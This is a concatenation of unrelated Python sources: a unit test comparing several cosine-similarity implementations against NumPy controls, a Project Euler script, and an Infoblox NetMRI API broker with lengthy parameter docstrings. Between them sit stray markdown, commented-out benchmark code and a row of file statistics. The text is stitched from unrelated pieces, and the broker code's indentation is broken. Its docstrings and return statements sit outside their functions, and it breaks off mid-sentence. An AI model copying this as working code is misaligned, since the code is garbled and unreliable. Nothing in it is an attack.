        cosine_similarity = Cosine_Similarity_Python(data_matrix, topK=TopK, normalize=True,
                                                     shrink=shrink, mode='pearson')
        W_dense_Python = cosine_similarity.compute_similarity()

        cosine_similarity = Cosine_Similarity_Parallel(data_matrix, topK=TopK, normalize=True,
                                                       shrink=shrink, mode='pearson')
        W_dense_Parallel = cosine_similarity.compute_similarity()

        # Control: mean-center each item (column) over its nonzero ratings, then cosine
        data_matrix = data_matrix.toarray().astype(np.float64)

        for col in range(data_matrix.shape[1]):
            nonzeroMask = data_matrix[:, col] > 0
            data_matrix[:, col][nonzeroMask] -= np.mean(data_matrix[:, col][nonzeroMask])

        W_dense_denominator = np.matlib.repmat((data_matrix ** 2).sum(axis=0), data_matrix.shape[1], 1)
        W_dense_denominator = np.sqrt(W_dense_denominator)
        W_dense_denominator = np.multiply(W_dense_denominator, W_dense_denominator.T) + shrink

        W_dense_mul = data_matrix.T.dot(data_matrix)
        W_dense_mul[W_dense_denominator > 0] /= W_dense_denominator[W_dense_denominator > 0]
        W_dense_mul[np.arange(W_dense_mul.shape[0]), np.arange(W_dense_mul.shape[0])] = 0.0

        assert np.allclose(W_dense_Cython, W_dense_mul, atol=1e-4), "W_dense_Cython not matching control"
        assert np.allclose(W_dense_Python, W_dense_mul, atol=1e-4), "W_dense_Python not matching control"
        assert np.allclose(W_dense_Parallel, W_dense_mul, atol=1e-4), "W_dense_Parallel not matching control"
    def test_cosine_similarity_dense_jaccard(self):

        from Base.Cython.cosine_similarity import Cosine_Similarity as Cosine_Similarity_Cython
        from Base.cosine_similarity import Compute_Similarity as Cosine_Similarity_Python
        from Base.cosine_similarity_parallel import Cosine_Similarity_Parallel
        import numpy.matlib

        TopK = 0
        shrink = 0

        data_matrix = np.array([[1, 2, 0, 1], [0, 1, 4, 1], [1, 3, 1, 0]])
        data_matrix = sps.csr_matrix(data_matrix)

        cosine_similarity = Cosine_Similarity_Cython(data_matrix, topK=TopK, normalize=True,
                                                     shrink=shrink, mode='jaccard')
        W_dense_Cython = cosine_similarity.compute_similarity()

        cosine_similarity = Cosine_Similarity_Python(data_matrix, topK=TopK, normalize=True,
                                                     shrink=shrink, mode='jaccard')
        W_dense_Python = cosine_similarity.compute_similarity()

        cosine_similarity = Cosine_Similarity_Parallel(data_matrix, topK=TopK, normalize=True,
                                                       shrink=shrink, mode='jaccard')
        W_dense_Parallel = cosine_similarity.compute_similarity()

        # Control: binarize, then intersection / (sizeA + sizeB - intersection)
        data_matrix.data = np.ones_like(data_matrix.data)
        data_matrix = data_matrix.toarray().astype(np.float64)

        W_dense_mul = data_matrix.T.dot(data_matrix)

        W_dense_denominator = np.matlib.repmat((data_matrix ** 2).sum(axis=0), data_matrix.shape[1], 1)
        W_dense_denominator = W_dense_denominator + W_dense_denominator.T - W_dense_mul + shrink

        W_dense_mul[W_dense_denominator > 0] /= W_dense_denominator[W_dense_denominator > 0]
        W_dense_mul[np.arange(W_dense_mul.shape[0]), np.arange(W_dense_mul.shape[0])] = 0.0

        assert np.allclose(W_dense_Cython, W_dense_mul, atol=1e-4), "W_dense_Cython not matching control"
        assert np.allclose(W_dense_Python, W_dense_mul, atol=1e-4), "W_dense_Python not matching control"
        assert np.allclose(W_dense_Parallel, W_dense_mul, atol=1e-4), "W_dense_Parallel not matching control"
    def test_cosine_similarity_dense_big(self):

        from Base.Cython.cosine_similarity import Cosine_Similarity as Cosine_Similarity_Cython
        from Base.cosine_similarity import Compute_Similarity as Cosine_Similarity_Python
        from Base.cosine_similarity_parallel import Cosine_Similarity_Parallel

        TopK = 0
        n_items = 500
        n_users = 1000

        data_matrix = sps.random(n_users, n_items, density=0.1)

        cosine_similarity = Cosine_Similarity_Cython(data_matrix, topK=TopK, normalize=False)
        W_dense_Cython = cosine_similarity.compute_similarity()

        cosine_similarity = Cosine_Similarity_Python(data_matrix, topK=TopK, normalize=False)
        W_dense_Python = cosine_similarity.compute_similarity()

        cosine_similarity = Cosine_Similarity_Parallel(data_matrix, topK=TopK, normalize=False)
        W_dense_Parallel = cosine_similarity.compute_similarity()

        W_dense_mul = data_matrix.T.dot(data_matrix).toarray()
        W_dense_mul[np.arange(W_dense_mul.shape[0]), np.arange(W_dense_mul.shape[0])] = 0.0

        assert np.allclose(W_dense_Cython, W_dense_mul, atol=1e-4), "W_dense_Cython not matching control"
        assert np.allclose(W_dense_Python, W_dense_mul, atol=1e-4), "W_dense_Python not matching control"
        assert np.allclose(W_dense_Parallel, W_dense_mul, atol=1e-4), "W_dense_Parallel not matching control"
    def test_cosine_similarity_TopK(self):

        from Base.Cython.cosine_similarity import Cosine_Similarity as Cosine_Similarity_Cython
        from Base.cosine_similarity import Compute_Similarity as Cosine_Similarity_Python
        from Base.cosine_similarity_parallel import Cosine_Similarity_Parallel

        TopK = 4

        data_matrix = np.array([[1, 1, 0, 1], [0, 1, 1, 1], [1, 0, 1, 0]])
        data_matrix = sps.csr_matrix(data_matrix)

        cosine_similarity = Cosine_Similarity_Cython(data_matrix, topK=TopK, normalize=False)
        W_dense_Cython = cosine_similarity.compute_similarity().toarray()

        cosine_similarity = Cosine_Similarity_Python(data_matrix, topK=TopK, normalize=False)
        W_dense_Python = cosine_similarity.compute_similarity().toarray()

        cosine_similarity = Cosine_Similarity_Parallel(data_matrix, topK=TopK, normalize=False)
        W_dense_Parallel = cosine_similarity.compute_similarity().toarray()

        W_dense_mul = data_matrix.T.dot(data_matrix)
        W_dense_mul[np.arange(W_dense_mul.shape[0]), np.arange(W_dense_mul.shape[0])] = 0.0
        W_dense_mul = similarityMatrixTopK(W_dense_mul, k=TopK).toarray()

        assert np.allclose(W_dense_Cython, W_dense_mul, atol=1e-4), "W_dense_Cython not matching control"
        assert np.allclose(W_dense_Python, W_dense_mul, atol=1e-4), "W_dense_Python not matching control"
        assert np.allclose(W_dense_Parallel, W_dense_mul, atol=1e-4), "W_dense_Parallel not matching control"
    def test_cosine_similarity_TopK_big(self):

        from Base.Cython.cosine_similarity import Cosine_Similarity as Cosine_Similarity_Cython
        from Base.cosine_similarity import Compute_Similarity as Cosine_Similarity_Python
        from Base.cosine_similarity_parallel import Cosine_Similarity_Parallel

        n_items = 500
        n_users = 1000
        TopK = n_items

        data_matrix = sps.random(n_users, n_items, density=0.1)

        cosine_similarity = Cosine_Similarity_Cython(data_matrix, topK=TopK, normalize=False)
        W_dense_Cython = cosine_similarity.compute_similarity().toarray()

        cosine_similarity = Cosine_Similarity_Python(data_matrix, topK=TopK, normalize=False)
        W_dense_Python = cosine_similarity.compute_similarity().toarray()

        cosine_similarity = Cosine_Similarity_Parallel(data_matrix, topK=TopK, normalize=False)
        W_dense_Parallel = cosine_similarity.compute_similarity().toarray()

        W_dense_mul = data_matrix.T.dot(data_matrix)
        W_dense_mul[np.arange(W_dense_mul.shape[0]), np.arange(W_dense_mul.shape[0])] = 0.0
        W_dense_mul = similarityMatrixTopK(W_dense_mul, k=TopK).toarray()

        assert np.allclose(W_dense_Cython, W_dense_mul, atol=1e-4), "W_dense_Cython not matching control"
        assert np.allclose(W_dense_Python, W_dense_mul, atol=1e-4), "W_dense_Python not matching control"
        assert np.allclose(W_dense_Parallel, W_dense_mul, atol=1e-4), "W_dense_Parallel not matching control"
def runCompilationScript():

    # Run the compile script setting the working directory, to ensure the compiled files are contained in the
    # appropriate subfolder and not in the project root

    compiledModuleSubfolder = "/Cython"
    fileToCompile = 'cosine_similarity.pyx'

    command = ['python',
               'compileCython.py',
               fileToCompile,
               'build_ext',
               '--inplace'
               ]

    output = subprocess.check_output(' '.join(command), shell=True, cwd=os.getcwd() + compiledModuleSubfolder)

    try:
        command = ['cython',
                   fileToCompile,
                   '-a'
                   ]

        output = subprocess.check_output(' '.join(command), shell=True, cwd=os.getcwd() + compiledModuleSubfolder)

    except subprocess.CalledProcessError:
        # The HTML annotation report is optional, ignore failures if cython is not available
        pass

    print("Compiled module saved in subfolder: {}".format(compiledModuleSubfolder))
# Command to run compilation script
# python compileCython.py cosine_similarity.pyx build_ext --inplace

# Command to generate html report
# cython -a cosine_similarity.pyx


if __name__ == '__main__':

    runCompilationScript()

    unittest.main()
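The TopK tests above delegate the control computation to similarityMatrixTopK. A minimal NumPy-only sketch of per-column top-K filtering is shown below; this is an illustrative assumption, not the actual Base.Recommender_utils implementation, which also handles sparse input and returns a sparse result.

```python
import numpy as np


def top_k_per_column(W, k):
    """Keep only the k largest entries in each column of a dense
    similarity matrix, zeroing everything else."""
    W = np.asarray(W, dtype=np.float64)
    W_topk = np.zeros_like(W)

    for col in range(W.shape[1]):
        if k < W.shape[0]:
            # Indices of the k largest values in this column
            top_idx = np.argpartition(-W[:, col], k - 1)[:k]
        else:
            top_idx = np.arange(W.shape[0])
        W_topk[top_idx, col] = W[top_idx, col]

    return W_topk
```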
#
# from data.NetflixEnhanced.NetflixEnhancedReader import NetflixEnhancedReader
#
# from Base.Cython.cosine_similarity import Cosine_Similarity as Cosine_Similarity_Cython
# from Base.Cython.cosine_similarity import cosine_common
#
# from Base.cosine_similarity import Cosine_Similarity as Cosine_Similarity_Python
#
# from Base.Recommender_utils import similarityMatrixTopK
#
# TopK = 100
#
# dataReader = Movielens10MReader()
# #dataReader = NetflixEnhancedReader()
# URM_train = dataReader.get_URM_train()
#
# start_time = time.time()
# cosine_similarity = Cosine_Similarity_Cython(URM_train, TopK=TopK)
# W_sparse_Cython = cosine_similarity.compute_similarity()
# print("Cosine_Similarity_Cython {:.2f} sec, {:.2f} item/sec".format(time.time() - start_time,
# URM_train.shape[1] / (time.time() - start_time)))
#
# start_time = time.time()
# W_cosine_common = cosine_common(URM_train)
# print("Cosine common {:.2f} sec, {:.2f} item/sec".format(time.time()-start_time, URM_train.shape[1] / (time.time() - start_time)))
#
# start_time = time.time()
# cosine_similarity = Cosine_Similarity_Python(URM_train, TopK=TopK)
# W_sparse_Python = cosine_similarity.compute_similarity()
# print("Cosine_Similarity_Python {:.2f} sec, {:.2f} item/sec".format(time.time() - start_time,
# URM_train.shape[1] / (time.time() - start_time)))
#
# start_time = time.time()
# product = URM_train.T.dot(URM_train)
# product[np.arange(product.shape[0]),np.arange(product.shape[0])] = 0.0
#
# W_sparse_Control = similarityMatrixTopK(product, k=TopK).toarray()
# print("similarityMatrixTopK {:.2f} sec, {:.2f} item/sec".format(time.time() - start_time,
# URM_train.shape[1] / (time.time() - start_time)))
| 43.765478 | 136 | 0.704377 | 3,057 | 23,327 | 5.044488 | 0.06248 | 0.084041 | 0.042021 | 0.083458 | 0.887426 | 0.870566 | 0.845276 | 0.827313 | 0.799494 | 0.795733 | 0 | 0.01733 | 0.205942 | 23,327 | 532 | 137 | 43.847744 | 0.815203 | 0.094226 | 0 | 0.701754 | 0 | 0 | 0.070096 | 0.000997 | 0 | 0 | 0 | 0 | 0.115789 | 1 | 0.042105 | false | 0.003509 | 0.150877 | 0 | 0.203509 | 0.003509 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
# 8-largestProductInASeries.py (cmaron/Project-Euler, MIT license)

s = '7316717653133062491922511967442657474235534919493496983520312774506326239578318016984801869478851843858615607891129494954595017379583319528532088055111254069874715852386305071569329096329522744304355766896648950445244523161731856403098711121722383113622298934233803081353362766142828064444866452387493035890729629049156044077239071381051585930796086670172427121883998797908792274921901699720888093776657273330010533678812202354218097512545405947522435258490771167055601360483958644670632441572215539753697817977846174064955149290862569321978468622482839722413756570560574902614079729686524145351004748216637048440319989000889524345065854122758866688116427171479924442928230863465674813919123162824586178664583591245665294765456828489128831426076900422421902267105562632111110937054421750694165896040807198403850962455444362981230987879927244284909188845801561660979191338754992005240636899125607176060588611646710940507754100225698315520005593572972571636269561882670428252483600823257530420752963450'
x = 0
for i in range(0, len(s)):
    p = 1
    for n in s[i:i + 5]:
        p *= int(n)
    if p > x:
        x = p
print(x)
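The same sliding-window search can be written as a reusable function with the window length as a parameter instead of the hard-coded 5 (and a loop bound that stops at the last full window):

```python
def largest_window_product(digits, width):
    """Return the largest product of `width` consecutive digits in the string."""
    best = 0
    for i in range(len(digits) - width + 1):
        product = 1
        for d in digits[i:i + width]:
            product *= int(d)
        best = max(best, product)
    return best
```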
# infoblox_netmri/api/broker/v3_8_0/if_addr_broker.py (infobloxopen/infoblox_netmri, Apache-2.0 license)

from ..broker import Broker
class IfAddrBroker(Broker):
    controller = "if_addrs"

    def show(self, **kwargs):
        """Shows the details for the specified if addr.
**Inputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` True
| ``default:`` None
:param IfAddrID: The internal NetMRI identifier for this interface address (the specific address configured on this specific interface).
:type IfAddrID: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of if addr methods. The listed methods will be called on each if addr returned and included in the output. Available methods are: vrf_name, vrf_description, vrf_rd, network_id, cap_if_net_provisioning_ipv4_ind, cap_if_net_provisioning_ipv6_ind, cap_if_net_deprovisioning_ipv4_ind, cap_if_net_deprovisioning_ipv6_ind, meta, data_source, device, interface.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: meta, data_source, device, interface.
:type include: Array of String
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return if_addr: The if addr identified by the specified IfAddrID.
:rtype if_addr: IfAddr
"""
return self.api_request(self._get_method_fullname("show"), kwargs)
    def index(self, **kwargs):
        """Lists the available if addrs. Any of the inputs listed may be used to narrow the list; other inputs will be ignored. Of the various ways to query lists, using this method is most efficient.
**Inputs**
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device containing the interface configured with this address.
:type DeviceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device containing the interface configured with this address.
:type DeviceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param IfAddrID: The internal NetMRI identifier for this interface address (the specific address configured on this specific interface).
:type IfAddrID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param IfAddrID: The internal NetMRI identifier for this interface address (the specific address configured on this specific interface).
:type IfAddrID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param InterfaceID: The internal NetMRI identifier for the interface configured with this address.
:type InterfaceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param InterfaceID: The internal NetMRI identifier for the interface configured with this address.
:type InterfaceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param SubnetIPNumeric: The numerical value of the network portion of the IP address.
:type SubnetIPNumeric: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param SubnetIPNumeric: The numerical value of the network portion of the IP address.
:type SubnetIPNumeric: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param ifIPDotted: The IP address in dotted (or colon-delimited for IPv6) format.
:type ifIPDotted: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ifIPDotted: The IP address in dotted (or colon-delimited for IPv6) format.
:type ifIPDotted: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param ifIPNumeric: The numerical value of the IP address.
:type ifIPNumeric: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ifIPNumeric: The numerical value of the IP address.
:type ifIPNumeric: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the if addrs as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of if addr methods. The listed methods will be called on each if addr returned and included in the output. Available methods are: vrf_name, vrf_description, vrf_rd, network_id, cap_if_net_provisioning_ipv4_ind, cap_if_net_provisioning_ipv6_ind, cap_if_net_deprovisioning_ipv4_ind, cap_if_net_deprovisioning_ipv6_ind, meta, data_source, device, interface.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: meta, data_source, device, interface.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. It will always appear, although it may not be the first record. See the :limit for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages and the first page with the start record will be returned. So if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` IfAddrID
:param sort: The data field(s) to use for sorting the output. Default is IfAddrID. Valid values are IfAddrID, InterfaceID, DeviceID, ifIndex, DataSourceID, AddrStartTime, AddrEndTime, AddrChangedCols, AddrTimestamp, ifIPDotted, ifIPNumeric, ifNetMaskDotted, ifNetMaskNumeric, SubnetIPNumeric, SubnetIPDotted, AciBdID, AciEpgID.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each IfAddr. Valid values are IfAddrID, InterfaceID, DeviceID, ifIndex, DataSourceID, AddrStartTime, AddrEndTime, AddrChangedCols, AddrTimestamp, ifIPDotted, ifIPNumeric, ifNetMaskDotted, ifNetMaskNumeric, SubnetIPNumeric, SubnetIPDotted, AciBdID, AciEpgID. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param NetworkID: The network id to which results would be limited.
:type NetworkID: Integer
**Outputs**
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:return if_addrs: An array of the IfAddr objects that match the specified input criteria.
:rtype if_addrs: Array of IfAddr
"""
return self.api_list_request(self._get_method_fullname("index"), kwargs)
    def search(self, **kwargs):
        """Lists the available if addrs matching the input criteria. This method provides a more flexible search interface than the index method, but searching using this method is more demanding on the system and will not perform to the same level as the index method. The input fields listed below will be used as in the index method, to filter the result, along with the optional query string and XML filter described below.
**Inputs**
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param AciBdID: ID of ACI bridge domain the device is assigned to
:type AciBdID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param AciBdID: ID of ACI bridge domain the device is assigned to
:type AciBdID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param AciEpgID: ID of ACI EPG the device is assigned to
:type AciEpgID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param AciEpgID: ID of ACI EPG the device is assigned to
:type AciEpgID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param AddrChangedCols: The fields that changed between this revision of the record and the previous revision.
:type AddrChangedCols: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param AddrChangedCols: The fields that changed between this revision of the record and the previous revision.
:type AddrChangedCols: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param AddrEndTime: The ending effective time of this revision of this record, or empty if still in effect.
:type AddrEndTime: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param AddrEndTime: The ending effective time of this revision of this record, or empty if still in effect.
:type AddrEndTime: Array of DateTime
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param AddrStartTime: The starting effective time of this revision of the record.
:type AddrStartTime: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param AddrStartTime: The starting effective time of this revision of the record.
:type AddrStartTime: Array of DateTime
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param AddrTimestamp: The date and time this record was collected or calculated.
:type AddrTimestamp: DateTime
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param AddrTimestamp: The date and time this record was collected or calculated.
:type AddrTimestamp: Array of DateTime
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record.
:type DataSourceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DataSourceID: The internal NetMRI identifier for the collector NetMRI that collected this data record.
:type DataSourceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device containing the interface configured with this address.
:type DeviceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceID: The internal NetMRI identifier for the device containing the interface configured with this address.
:type DeviceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param IfAddrID: The internal NetMRI identifier for this interface address (the specific address configured on this specific interface).
:type IfAddrID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param IfAddrID: The internal NetMRI identifier for this interface address (the specific address configured on this specific interface).
:type IfAddrID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param InterfaceID: The internal NetMRI identifier for the interface configured with this address.
:type InterfaceID: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param InterfaceID: The internal NetMRI identifier for the interface configured with this address.
:type InterfaceID: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param SubnetIPDotted: The network portion of the IP address in dotted (or colon-delimited for IPv6) format.
:type SubnetIPDotted: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param SubnetIPDotted: The network portion of the IP address in dotted (or colon-delimited for IPv6) format.
:type SubnetIPDotted: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param SubnetIPNumeric: The numerical value of the network portion of the IP address.
:type SubnetIPNumeric: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param SubnetIPNumeric: The numerical value of the network portion of the IP address.
:type SubnetIPNumeric: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param ifIPDotted: The IP address in dotted (or colon-delimited for IPv6) format.
:type ifIPDotted: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ifIPDotted: The IP address in dotted (or colon-delimited for IPv6) format.
:type ifIPDotted: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param ifIPNumeric: The numerical value of the IP address.
:type ifIPNumeric: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ifIPNumeric: The numerical value of the IP address.
:type ifIPNumeric: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param ifIndex: The SNMP interface index of the interface configured with this address.
:type ifIndex: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ifIndex: The SNMP interface index of the interface configured with this address.
:type ifIndex: Array of Integer
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param ifNetMaskDotted: The network mask value in dotted (or colon-delimited for IPv6) format.
:type ifNetMaskDotted: String
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ifNetMaskDotted: The network mask value in dotted (or colon-delimited for IPv6) format.
:type ifNetMaskDotted: Array of String
| ``api version min:`` 2.3
| ``api version max:`` 2.4
| ``required:`` False
| ``default:`` None
:param ifNetMaskNumeric: The numerical value of the network mask.
:type ifNetMaskNumeric: Integer
| ``api version min:`` 2.5
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param ifNetMaskNumeric: The numerical value of the network mask.
:type ifNetMaskNumeric: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param DeviceGroupID: The internal NetMRI identifier of the device groups to which to limit the results.
:type DeviceGroupID: Array of Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param timestamp: The data returned will represent the if addrs as of this date and time. If omitted, the result will indicate the most recently collected data.
:type timestamp: DateTime
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param methods: A list of if addr methods. The listed methods will be called on each if addr returned and included in the output. Available methods are: vrf_name, vrf_description, vrf_rd, network_id, cap_if_net_provisioning_ipv4_ind, cap_if_net_provisioning_ipv6_ind, cap_if_net_deprovisioning_ipv4_ind, cap_if_net_deprovisioning_ipv6_ind, meta, data_source, device, interface.
:type methods: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param include: A list of associated object types to include in the output. The listed associations will be returned as outputs named according to the association name (see outputs below). Available includes are: meta, data_source, device, interface.
:type include: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 0
:param start: The record number to return in the selected page of data. This record will always appear, although it may not be the first record on the page. See the :limit documentation for more information.
:type start: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` 1000
:param limit: The size of the page of data, that is, the maximum number of records returned. The limit size will be used to break the data up into pages, and the first page containing the start record will be returned. For example, if you have 100 records and use a :limit of 10 and a :start of 10, you will get records 10-19. The maximum limit is 10000.
:type limit: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` IfAddrID
:param sort: The data field(s) to use for sorting the output. Default is IfAddrID. Valid values are IfAddrID, InterfaceID, DeviceID, ifIndex, DataSourceID, AddrStartTime, AddrEndTime, AddrChangedCols, AddrTimestamp, ifIPDotted, ifIPNumeric, ifNetMaskDotted, ifNetMaskNumeric, SubnetIPNumeric, SubnetIPDotted, AciBdID, AciEpgID.
:type sort: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` asc
:param dir: The direction(s) in which to sort the data. Default is 'asc'. Valid values are 'asc' and 'desc'.
:type dir: Array of String
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param select: The list of attributes to return for each IfAddr. Valid values are IfAddrID, InterfaceID, DeviceID, ifIndex, DataSourceID, AddrStartTime, AddrEndTime, AddrChangedCols, AddrTimestamp, ifIPDotted, ifIPNumeric, ifNetMaskDotted, ifNetMaskNumeric, SubnetIPNumeric, SubnetIPDotted, AciBdID, AciEpgID. If empty or omitted, all attributes will be returned.
:type select: Array
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_field: The field name for NIOS GOTO that is used for locating a row position of records.
:type goto_field: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param goto_value: The value of goto_field for NIOS GOTO that is used for locating a row position of records.
:type goto_value: String
| ``api version min:`` 2.8
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param NetworkID: The network ID to which results will be limited.
:type NetworkID: Integer
| ``api version min:`` None
| ``api version max:`` None
| ``required:`` False
| ``default:`` None
:param query: This value will be matched against if addrs, looking to see if one or more of the listed attributes contain the passed value. You may also surround the value with '/' and '/' to perform a regular expression search rather than a containment operation. Any record that matches will be returned. The attributes searched are: AciBdID, AciEpgID, AddrChangedCols, AddrEndTime, AddrStartTime, AddrTimestamp, DataSourceID, DeviceID, IfAddrID, InterfaceID, SubnetIPDotted, SubnetIPNumeric, ifIPDotted, ifIPNumeric, ifIndex, ifNetMaskDotted, ifNetMaskNumeric.
:type query: String
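For illustration, a minimal sketch of the two ``query`` forms described above (only the documented parameter is shown; the surrounding search call is assumed, not shown):

```python
# Containment search: matches records where any of the listed
# attributes contains the substring "10.0.".
containment = {"query": "10.0."}

# Regular-expression search: surrounding the value with '/' switches the
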